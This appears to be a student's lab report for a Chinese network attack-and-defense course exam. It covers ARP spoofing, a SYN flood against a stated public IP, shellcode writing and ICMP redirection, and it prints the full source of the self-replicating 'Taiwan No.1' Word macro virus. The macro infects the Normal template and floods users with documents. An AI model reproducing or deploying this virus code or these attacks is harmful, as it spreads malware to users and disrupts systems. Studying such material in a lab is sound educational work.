《網絡攻擊與防禦》課程機考試題
機考要求:
1.考試時間內完成所有實驗考覈內容;
2.需完整實驗並記錄下實驗過程;
3.考試時間120分鐘;
4.滿分100分,每題20分。
一、利用Netwag或類似工具進行ARP欺騙攻擊,並利用Wireshark捕獲相關網絡數據。
這裏使用的是kali工具:ettercap,三臺機器,一臺服務器,一臺客戶端,一臺攻擊機,kali當作攻擊機,windowsxp當作客戶端,windows2003當作服務端。
首先搭好服務器:
然後客戶端訪問:
打開kali的工具ettercap,查找主機,找到兩個:
配置好之後,在客戶端輸入123,密碼123,kali進行查看到賬戶密碼,欺騙成功:
二、利用Netwag或類似工具進行DDOS攻擊,並利用Wireshark捕獲相關網絡數據。
這裏用的是SYN Floor攻擊,SYN Flood是當前最流行的DoS與DDoS的攻擊方式之一。
netwag選擇76號,輸入SYN flood攻擊的目標ip和端口,這裏使用的IP:122.13.75.80:
運行之後輸入過濾規則,方便查看:ip.src122.13.75.80 or ip.dst122.13.75.80,結果如下:
三、請編寫一段Shellcode,並將實驗過程及結果詳細記錄下來。
運行一個代碼:
下斷點,然後查看彙編代碼:
記錄下地址,然後查看內存:
這是真實地址:
編寫彙編程序,運行得到:
下斷點,調式:
查看彙編代碼:
查看內存,複製如下數值:
然後這個數值就是shellcode,編寫如下代碼:
運行之後也能彈出窗口:
四、利用Netwag或類似工具進行ICMP重定向攻擊,並利用Wireshark捕獲相關網絡數據。
打開Netwag軟件找到86:
在newgateway填寫自己的ip地址,使自己ip僞造成路由器:
攻擊結果如下:
五、利用“臺灣一號”宏病毒進行實驗性攻擊,並將實驗過程及結果詳細記錄下來。
打開word2003,修改設置,工具->宏->安全性->安全性選擇最低
點擊確定!然後alt+F11進入編輯界面,在對應的地方輸入宏代碼,然後保存:
修改時間日期爲1號,然後雙擊打開文檔,出現如下界面:
輸入正確的答案得到,錯誤則會顯示很多的word文檔,結束進程即可關閉:
臺灣一號宏代碼:
'moonlight
Dim nm(4)
Sub Document_Open()
'DisableInput 1
Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule
Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With host
If .Lines(1, 1) <> "'moonlight" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 3, "Sub Document_Close()"
If ThisDocument = NormalTemplate Then
.ReplaceLine 3, "Sub Document_Open()"
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End If
End With
Count = 0
If Day(Now()) = 1 Then
try:
On Error GoTo try
test = -1
con = 1
tog$ = ""
i = 0
While test = -1
For i = 0 To 4
nm(i) = Int(Rnd() * 10)
con = con * nm(i)
If i = 4 Then
tog$ = tog$ + Str$(nm(4)) + "=?"
GoTo beg
End If
tog$ = tog$ + Str$(nm(i)) + "*"
Next i
beg:
Beep
ans$ = InputBox$("今天是" + Date$ + ",跟你玩一個心算遊戲" + Chr$(13) + "若你答錯,只好接受震撼教育......" + Chr$(13) + tog$, "臺灣NO.1 Macro Virus")
If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then
Documents.Add
Selection.Paragraphs.Alignment = wdAlignParagraphCenter
Beep
With Selection.Font
.Name = "細明體"
.Size = 16
.Bold = 1
.Underline = 1
End With
Selection.InsertAfter Text:="何謂宏病毒"
Selection.InsertParagraphAfter
Beep
Selection.InsertAfter Text:="答案:"
Selection.Font.Italic = 1
Selection.InsertAfter Text:="我就是......"
Selection.InsertParagraphAfter
Selection.InsertParagraphAfter
Selection.Font.Italic = 0
Beep
Selection.InsertAfter Text:="如何預防宏病毒"
Selection.InsertParagraphAfter
Beep
Selection.InsertAfter Text:="答案:"
Selection.Font.Italic = 1
Selection.InsertAfter Text:="不要看我......"
GoTo out
Else
Count = Count + 1
For j = 1 To 20
Beep
Documents.Add
Next j
Selection.Paragraphs.Alignment = wdAlignParagraphCenter
Selection.InsertAfter Text:="宏病毒"
If Count = 2 Then GoTo out
GoTo try
End If
Wend
End If
out:
End Sub